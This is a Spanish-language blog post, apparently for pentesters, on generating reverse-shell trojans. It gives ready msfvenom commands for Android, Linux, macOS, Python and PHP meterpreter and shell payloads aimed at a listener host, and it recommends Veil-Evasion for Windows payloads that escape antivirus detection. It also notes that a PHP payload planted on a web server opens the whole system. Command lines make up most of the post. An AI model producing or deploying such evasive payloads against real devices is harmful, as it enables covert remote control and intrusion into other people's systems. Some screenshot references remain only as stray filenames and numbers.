image_large

Hola amigos y amigas, hacía muchos meses que no escribía una entrada de este estilo, pero no es porque no haya querido o halla abandonado el proyecto del blog, espero que ese día nunca llegue, ha sido debido a la falta de tiempo, os diré que llevo como un mes pasando 12 horas fuera de casa al día pero dice el refrán…. lo que cuesta, merece.

Bien, casualmente, esta mañana he estado investigando sobre los tipos de payloads que permite generar metasploit con msfvenom y no me he topado con ninguna fuente de información que genere contenido decente, y con decente me refiero a fuzz o actualizado, debido a eso he decidido escribir sobre ello.

Comenzaré diciendo que me voy a centrar en los 4 sistemas operativos más utilizados en todo el mundo que son Windows, Android, Basados en Linux, y MacOs.

Si estáis inmersos en el mundo del pentesting, ya sea mucho o poco, seguro que ya habréis pasado por la generación de un troyano y seguro que ha sido generado con MsfVenom o con programas que trabajan con su core para generarlos, en este punto quiero recalcar algunas cosas, MsfVenom es ideal para generar payloads que nos permitan establecer una conexión reversa en sistemas base Linux como Ubuntu, Debian, Arch, Android, Servidores Web …., e incluso es capaz de generar algunos para MacOS, pero lo que no es factible es generar un fuzz para Windows con MsfVenom. Hablamos de payloads fuzz cuando estos no son detectados por las soluciones antivirus.

Cómo venía comentando en las líneas anteriores, si deseamos generar un payload funcional para Windows, la mejor opción es VeilEvasion. VeilEvasion está disponible en Github para su descarga y nos permite generar infinidad de payloads pero en esta ocasión nos centraremos en los exe con la reverse_tcp.

*Leer nota al final del post relevante a las arquitecturas x64 o x86_x64

Reverse_tcp [ Windows ]

instalacion Kali y VeilEvasion

Bien si ya habéis leído el enlace que os he dejado ya estamos listos para generar un payload fuzz para windows, entonces una vez ejecutemos VeilEvasion haremos lo siguiente:

123456789

de este modo obtenemos un payload tanto para x86 como para x64

Reverse_tcp [Android]


msfvenom -p  android/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=8888 -o AndoidPayload.apk

11

Reverse_tcp [ Linux y deribados ]


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=8888 -f elf -o LinuxPayload.elf

msfvenom -p linux/x64/reverse_tcp LHOST=192.168.1.138 LPORT=8888 -f elf -o LinuxPayload.elf

22.PNG

Reverse_tcp [ MacOs ]

Llegados al apartado de MacOS, os diré que realmente es complicado que un noob que se ha comprado un Mac sea capaz de lanzar un payload, demasiado complicado…. un método menos sospechoso que el archivo ejecutable de MacOs es inyectar un programa Python con un payload también Python, no obstante el MsfVenom de Mac es este:


msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.138 LPORT=8888 -f osx-app -o MacOsPayload

msfvenom -p osx/x64/shell_reverse_tcp LHOST=192.168.1.138 LPORT=8888 -f osx-app -o MacOsPayload

44

Reverse_tcp [ Python [ Multiplataforma ] ]


msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=8888 -o PythonPayload.py

33.PNG

Reverse_tcp [ PHP [ Multiplataforma  [WEB] ] ]

Este es el punto en el que llegamos al payload por excelencia de los entornos web, si conseguimos colocar este payload en un web server, tenemos la puerta abierta a todo el sistema.


msfvenom -p  php/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=8888 -o PHP_Payload.php

55.PNG

*Cuando se crean los payloads y se usa el x86 es debido a que se genera para una arquitectura de 32 bits, en caso de desear un payload de arquitectura 64 bits se debe usar x64 .
Anuncios